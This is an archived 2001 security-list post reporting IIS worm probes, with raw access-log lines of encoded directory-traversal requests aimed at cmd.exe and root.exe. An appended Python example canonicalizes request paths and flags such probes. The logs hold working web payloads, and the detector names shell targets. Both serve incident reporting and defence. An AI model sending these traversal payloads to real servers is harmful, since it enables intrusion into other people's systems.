Looks like a fair amount of traffic this morning amongst compromised NT/2k boxen. The 63.x.y.z as well as the 65.x.y.z is seeing a fair amount of traffic, similar to the following:

aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 328 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 367 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 367 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 383 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 "-" "-"
aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 "-" "-"

Log times are PST.

-aj.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 10:00:58 PDT
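
An added example, not part of the original post: one way to flag these probes in an access log is to reduce every request path to a canonical form (repeated percent-decoding, then folding the overlong two-byte sequences) before matching. The function names are hypothetical, the first five sample lines are copied from the post, the last is constructed, and the low-6-bit folding is an assumption about how a permissive decoder treats the second byte.

```python
import re
from urllib.parse import unquote_to_bytes

REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')
OVERLONG = re.compile(rb"([\xc0\xc1])(.)", re.S)   # overlong 2-byte lead bytes
SHELLS = ("cmd.exe", "root.exe")

def canonicalize(target: str) -> str:
    """Reduce a request target to the path a permissive decoder could reach."""
    raw = target.split("?", 1)[0].encode("latin-1", "replace")
    for _ in range(5):            # peel nested layers: %255c, %%35%63, %25%35%63
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    # Assumption: only the low 6 bits of the second byte are kept, so
    # c0 af and c0 2f fold to '/', c1 9c and c1 1c fold to '\'.
    raw = OVERLONG.sub(
        lambda m: bytes([((m[1][0] & 0x1F) << 6) | (m[2][0] & 0x3F)]), raw)
    return raw.decode("latin-1").replace("\\", "/").lower()

def classify(line: str):
    """Return (status, canonical_path, reasons) for a probe, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    path = canonicalize(m[1])
    reasons = []
    if ".." in path.split("/"):
        reasons.append("traversal")
    if path.endswith(SHELLS):
        reasons.append("shell")
    return (int(m[2]), path, reasons) if reasons else None

PREFIX = 'aa.bb.cc.dd - - [18/Sep/2001:06:27:47 -0700] '
SAMPLE = [PREFIX + rest for rest in (
    '"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 "-" "-"',
    '"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"',
    '"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"',
    '"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 "-" "-"',
    '"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 328 "-" "-"',
    '"GET /index.html HTTP/1.0" 200 1024 "-" "-"',   # constructed benign line
)]

if __name__ == "__main__":
    for entry in SAMPLE:
        print(classify(entry))
```

A hit with a 2xx status instead of the 404/400 seen here means the requested path was actually served on that host and is the case to triage first.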